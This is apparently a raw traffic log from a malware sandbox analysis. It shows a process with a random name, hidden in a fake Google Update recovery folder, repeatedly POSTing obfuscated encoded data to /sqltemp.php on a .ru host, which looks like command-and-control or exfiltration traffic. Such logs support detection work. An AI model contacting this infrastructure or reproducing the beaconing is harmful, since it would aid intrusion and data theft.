                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QECwCsWnbW4QVAdZ7H%2BN0PzVRcABeyTsnQOf57988IlIenQYaxfbmbMRHLKfIifhTjK7QjEokqL%2BSWob6Ce%2FfzR7r7h%2FD%2Fo8mxTJccPZBnaIok9uDgNxYL%2BMY%2F26kn0kQkoCkAvM"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3656fd8be187d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4597&min_rtt=1473&rtt_var=6801&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=55163&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  102192.168.2.662741104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:28.329705000 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:28.688607931 CET1124OUTData Raw: 56 55 5f 54 54 51 51 52 58 56 52 59 56 5a 59 53 5b 5b 54 5d 55 5a 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_TTQQRXVRYVZYS[[T]UZPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.0>",&%>?/>#[ _*:7W*> $?%B%,*&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:28.776361942 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:29.030249119 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bk1v5Yobxvq6pgmi96Ps%2FryGkIaF2wqV4MJ2qqhCd%2F7iuoLbhceLQgD1V9ial8vg%2Bdt0Tf82FW3kwHwjptADcvSmg7NAB1%2FaKlcDMOfFihGNtz7Rd%2BpXtz8jDdpru7MLpjiNDlvV"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365748ea542d5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2586&min_rtt=1744&rtt_var=2339&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=172027&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  103192.168.2.662742104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:29.162441969 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:29.516829014 CET1124OUTData Raw: 53 53 5f 5c 51 58 51 51 58 56 52 59 56 5d 59 56 5b 5a 54 59 55 5e 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_\QXQQXVRYV]YV[ZTYU^PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'-X#X3X;,)-R#[$**'T)$X7T3Y?(!B2/:&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:29.606937885 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:29.867603064 CET813INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQefpbUCx%2BbwYC3EAHckSHMvtmcpAaua2bIngCUHB8AG%2ByZ038xc0S6y2a0HpW0y08XH97l7j67E%2BfimslTWEWsq%2F7gmiFz2DJBK1bpzEY%2Bn3%2BUkUVubP4GmYnZsjR%2B66nCr1Zwo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36579cc0a41e0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1767&rtt_var=1102&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=414066&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  104192.168.2.662743104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:29.985847950 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:30.344861031 CET1124OUTData Raw: 56 56 5f 53 51 5f 54 54 58 56 52 59 56 5a 59 53 5b 5e 54 5e 55 58 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_SQ_TTXVRYVZYS[^T^UXP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3?="/"$'E8W7=<_<9)-(\#+[(=2<::&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:30.429852009 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:30.602660894 CET813INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mOwLQ3lRDU1nNmqU15UvqTpj1%2FBSxv9RvNXQy6R3BYlBoGRS4%2B%2FGpLZmk2JzQVMw8g%2FNH5oDEoTG5%2FCvwl5JCakY1H8TqZRXm2h%2B3hDq8dC1chkpRwdLGpHNShZIxldMD%2FhtaClC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3657eee460f9b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2549&min_rtt=1696&rtt_var=2343&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=171220&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  105192.168.2.662744104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:30.721527100 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  106192.168.2.662745104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:30.831120014 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:31.188606977 CET1964OUTData Raw: 53 54 5a 57 51 58 54 54 58 56 52 59 56 5b 59 50 5b 58 54 51 55 55 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: STZWQXTTXVRYV[YP[XTQUUPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.[3,=#!]0> /*> [$(7>>?#2+(;%A2?#U9:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:31.271480083 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:31.575083971 CET954INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sTPrcZdTH9RzEVpWsjACYQBYSselUe4SRII04qo4w9Y4RLKiIZW0J%2FrtCl64dvbj3ItuMsUgV1JSNwgsqod5chRMnuvzb%2BPcj9siX7SmqD9aDhjAmVI22txAm%2FjoQ8N3QKQhHvXo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36584294143bc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3003&min_rtt=1798&rtt_var=3085&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=127577&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 54 29 13 0c 1e 25 54 2c 1e 3c 04 33 57 31 58 31 00 29 28 0b 01 27 58 3c 02 3d 3a 3f 5b 21 3f 31 13 26 38 24 5f 23 3d 3b 5e 24 0e 2b 59 05 1c 23 18 21 3f 3c 12 29 13 38 06 26 01 26 02 30 3e 2f 05 28 01 2f 0c 34 15 01 10 24 2e 37 03 29 04 20 1e 24 3c 05 5b 39 06 2d 1f 30 00 2c 54 00 11 26 57 24 31 19 01 20 0e 3c 12 21 0f 13 1d 24 24 29 0e 32 3c 3f 16 37 17 3e 59 31 31 3f 59 22 55 3e 11 32 38 22 03 37 5b 2c 0b 3d 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%T)%T,<3W1X1)('X<=:?[!?1&8$_#=;^$+Y#!?<)8&&0>/(/4$.7) $<[9-0,T&W$1 <!$$)2<?7>Y11?Y"U>28"7[,=.%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  107192.168.2.662746104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:30.957109928 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:31.313563108 CET1124OUTData Raw: 56 56 5f 57 51 58 54 56 58 56 52 59 56 58 59 5e 5b 5a 54 50 55 55 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_WQXTVXVRYVXY^[ZTPUUP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3/64?'>@,:)R [8+90>'#!4(+*%Y<.&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:03:31.411168098 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:31.664926052 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zSZcddzbyyQzv%2Bd4osYnu5ZYwsAXExRv4QQjKVe%2Bg8VcIs3IwExBWTtq6SfJG0SJj7Uu2d1x7by20yb4qQ45gq4IN%2BTZd%2BkCn4T9Vr8nuKJQcCDLBBCYPCb%2BLRUficQY9t8NsL%2Fs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365850cfd4326-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5326&min_rtt=2474&rtt_var=6631&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57730&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  108192.168.2.662747104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:31.783994913 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:32.141781092 CET1124OUTData Raw: 53 53 5a 57 51 5c 51 55 58 56 52 59 56 5e 59 56 5b 5a 54 5e 55 5e 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SSZWQ\QUXVRYV^YV[ZT^U^P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?*#?.3X#D;:&4Y**?W(.'!"3+;9D1/ ::&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:32.237021923 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:32.431332111 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZuKBv0Aa61%2FiSQMdQvxb00avjUmd61pGNnmwZdq%2B9P4xXE9xux6G2cxnIM6QKVGNqbvWsiJP0XfJ06rkmDu2Xrd5ZBlvo9KmJa65D3fOvncFhzYucMw2UiIgl4bvou%2B%2B8sks1a2L"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3658a2c4d8c4b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5185&min_rtt=2040&rtt_var=7055&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=53676&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  109192.168.2.662748104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:32.551105022 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:32.907444954 CET1124OUTData Raw: 56 56 5a 57 51 5b 54 52 58 56 52 59 56 50 59 54 5b 5c 54 5d 55 5e 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VVZWQ[TRXVRYVPYT[\T]U^PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.['/:#/_$ 89= -3+4),Y# ?%??W,:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:33.023648024 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:33.301673889 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7VQKM2wyTEiLOtx689Lt8iKX71qOhnGfxakrGXJX%2BhZ1Y4zFlWpuuKGl3b2isCKvjpTAZyQB4etjcc50%2FjMXDyR27RxMqrujSpQPYarN1L3Jz7MAziz4IFxN7UdqqIydknEYTB43"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3658f1ed48c11-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4900&min_rtt=1955&rtt_var=6624&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57214&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  110192.168.2.662749104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:33.425148964 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:33.782366991 CET1124OUTData Raw: 56 52 5f 53 51 5b 51 51 58 56 52 59 56 5a 59 52 5b 53 54 51 55 5c 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_SQ[QQXVRYVZYR[STQU\P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y'4:'.9%4>?(:?*. !,?=28,:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:33.870084047 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:34.124664068 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4IDWEAhM%2Bm1MrdNJBQ7iYVvBJKyKljMpkPIiQgU9cMUS7%2FPXnAZrDdZJGoW%2BU41Wp%2FNKQcU8m0wQ0p1e20ARpsHYX4iQps7vvPLL6YjY3sd5dOIvytyAi2Ka3HQxqhOMgf1k8uyG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365946bc08c5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2566&min_rtt=2030&rtt_var=1834&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=230866&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  111192.168.2.662750104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:34.254590988 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
